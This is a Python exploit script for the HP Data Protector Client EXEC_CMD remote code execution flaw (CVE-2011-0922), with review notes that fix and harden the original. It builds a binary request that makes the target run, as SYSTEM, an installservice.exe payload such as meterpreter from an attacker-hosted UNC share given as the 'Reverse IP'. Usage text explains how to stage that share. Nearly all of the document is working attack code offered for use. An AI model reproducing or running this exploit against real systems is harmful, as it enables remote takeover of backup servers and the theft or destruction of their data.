
HP Data Protector Client 6.11 / 6.20 Remote Code Execution

Posted on 20 June 2012

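#!/usr/bin/env python
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Usage: ./hp_protector.py <Target IP> <Port> <Reverse IP>
#
# Before running, stage a share reachable from the target as
#   \\<Reverse IP>\Omniback\i386\installservice.exe
# (e.g. a meterpreter executable). The original author notes that the
# target's SYSTEM account must be able to read that share, which is not
# always trivial (anonymous / machine-account access to the share).
#
# Review notes on this listing:
#   * The published copy of this file had every backslash stripped from the
#     string escapes ("x00x00..." instead of "\x00\x00...", "33[0;31m" instead
#     of "\033[0;31m"), so as printed it would send the ASCII text of the hex
#     digits rather than the intended bytes. The escapes are restored below.
#   * send() was replaced by sendall() (a short send silently truncated the
#     payload), the socket is now closed on every path, and the read loop has
#     a timeout so the script cannot hang forever on a service that keeps the
#     connection open.
#   * Server responses are hex-dumped instead of written raw to the terminal,
#     so target-controlled bytes (including terminal escape sequences) never
#     reach the console unescaped.
#   * Runs under both Python 2 and Python 3 (bytes literals, print function).
from __future__ import print_function

import binascii
import socket
import sys

# ANSI colours used by the original usage banner.
_RED = "\033[0;31m"
_GREEN = "\033[0;32m"
_RESET = "\033[0m"

# Seconds to wait for each recv() before giving up on further output.
# The original blocked until the peer closed the connection.
RECV_TIMEOUT = 10.0


def _interleave_nul(lhost):
    """Return *lhost* as bytes with a NUL byte placed BEFORE every character.

    This is the original exploit's `"\\x00" + char` loop. The payload literals
    around each insertion point end on the low byte of the preceding UTF-16LE
    code unit, so a NUL-first layout makes the address line up as UTF-16LE
    inside the message.

    Args:
        lhost: the reverse-share host, as str (ASCII) or bytes.

    Returns:
        bytes, e.g. ``b"\\x001\\x00."`` for ``"1."``; ``b""`` for an empty input.

    Raises:
        UnicodeEncodeError: if a str *lhost* contains non-ASCII characters.
    """
    if not isinstance(lhost, bytes):
        lhost = lhost.encode("ascii")
    out = bytearray()
    # bytearray iteration yields ints on both Python 2 and 3.
    for ch in bytearray(lhost):
        out.append(0)
        out.append(ch)
    return bytes(out)


def build_payload(lhost):
    """Build the two-message request sent to the Data Protector client port.

    Decoding the byte strings, both messages are ``\\xff\\xfe``-prefixed
    (UTF-16LE BOM) strings of NUL/space separated fields, each preceded by a
    fixed 4-byte prefix (``\\x00\\x00\\x01\\xbe`` and ``\\x00\\x00\\x02\\x54``):

      message 1: ``2 <lhost> 0 SYSTEM NT AUTHORITY C 26
                 \\\\<lhost>\\Omniback\\i386\\installservice.exe -source ...
                 \\\\<lhost>\\Omniback\\i386\\installservice.exe -source
                 \\\\<lhost>\\Omniback``
      message 2: ``26 [0]ADD/UPGRADE\\n\\\\<lhost>\\Omniback\\i386``

    NOTE(review): the two 4-byte prefixes are constants even though *lhost*
    is variable-length; they look like length or type fields but their
    meaning cannot be derived from this listing, and they are reproduced
    verbatim from the published exploit. Likewise, in the first message the
    UTF-16 alignment shifts by one byte after the first ``-source `` (the
    ``\\x20\\x4f`` below) and shifts back after the third <lhost> insertion
    (which is not followed by ``\\x00``); whether that is intentional is not
    known, so the bytes are kept exactly as published.

    Args:
        lhost: host part of the UNC path the target should execute from.

    Returns:
        The complete request as bytes.
    """
    b = _interleave_nul(lhost)
    payload = (
        # -- message 1: "2 <lhost> 0 SYSTEM NT AUTHORITY C 26 \\<lhost>\Omniback\i386\installservice.exe -source ..."
        b"\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20" + b + b"\x00\x00\x00\x20\x00\x30\x00"
        b"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
        b"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
        b"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
        b"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
        b"\x5c" + b + b"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
        b"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
        b"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
        b"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
        b"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
        # alignment shifts by one byte at "\x20\x4f" (see docstring)
        b"\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
        b"\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c" + b + b"\x5c\x00\x5c\x00\x4f\x00"
        b"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
        b"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
        b"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
        b"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
        b"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
        b"\x5c\x00\x5c" + b + b"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
        # "k " + terminator, then the fixed prefix of message 2
        b"\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
        # -- message 2: "26 [0]ADD/UPGRADE\n\\<lhost>\Omniback\i386"
        b"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
        b"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
        b"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c" + b + b"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
        b"\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    )
    return payload


def _usage():
    """Print the original usage banner (same text and colours as the original)."""
    print("")
    print(_RED + "Usage: ./hp_protector.py <Target IP> <Port> <Reverse IP> " + _RESET)
    print("")
    print(_GREEN + "Make sure you create a meterpreter payload and a share with the following "
          "\\\\<Reverse IP>\\Omniback\\i386\\installservice.exe" + _RESET)
    print(_GREEN + "Also make sure the SYSTEM account on windows can access your share, "
          "this is not always trivial" + _RESET)
    print("")


def main(argv=None):
    """Parse ``<Target IP> <Port> <Reverse IP>``, send the payload, dump replies.

    Args:
        argv: full argument vector including the program name; defaults to
            ``sys.argv``.

    Exits with status 1 on a usage error. Socket errors propagate as in the
    original (a traceback is the operator's signal that the port is closed).
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 4:
        _usage()
        sys.exit(1)

    host = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        # Non-numeric port: treat like any other usage error instead of a traceback.
        _usage()
        sys.exit(1)
    lhost = argv[3]

    payload = build_payload(lhost)
    # Hex instead of raw bytes: the payload is binary and unprintable.
    print(binascii.hexlify(payload).decode("ascii"))

    sock = socket.create_connection((host, port), RECV_TIMEOUT)
    try:
        print("Sending payload")
        # sendall() retries until the whole buffer is on the wire; send() may
        # return early and silently drop the tail of the request.
        sock.sendall(payload)
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                # Service kept the connection open without more data.
                break
            if not data:
                break
            # Never write target-controlled bytes straight to the terminal.
            print(binascii.hexlify(data).decode("ascii"))
    finally:
        sock.close()


if __name__ == "__main__":
    main()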

 
